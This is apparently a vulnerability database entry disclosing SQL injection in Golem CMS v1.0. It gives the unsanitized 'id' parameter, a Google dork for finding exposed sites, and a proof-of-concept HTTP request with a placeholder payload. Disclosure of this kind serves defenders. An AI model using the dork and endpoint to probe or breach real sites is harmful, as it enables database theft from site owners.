Golem [CMS] v1.0 - SQL Injection

2018.04.17

Credit: TukangSihir

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: inurl:cms-admin

# Exploit Title: Golem [CMS] v1.0 - SQL Injection
# Google Dork: inurl:cms-admin
# Date: 2018 April 17
# Exploit Author: TukangSihir
# Vendor Homepage: http://www.spaziogrezzo.it/
# Version: 1.0
# Tested on: Ubuntu
1. Description
not validate or sanitize at the parameters "id", so attacker can do SQL-Injection vulnerablities, and attacker can see the database
#####POC#####
GET /it/eventi-dettaglio.php?id=[SQLi] HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: [target]
Cookie: displayCookieConsent=y; _ga=GA1.2.353727022.1523902983; _gid=GA1.2.999499184.1523902983; PHPSESSID=lps0dkpciu5pss5fubomah7116
Connection: close
Upgrade-Insecure-Requests: 1
#############

See this note in RAW Version

Vote for this issue:

66%

34%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Golem [CMS] v1.0 - SQL Injection

Dork: inurl:cms-admin

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.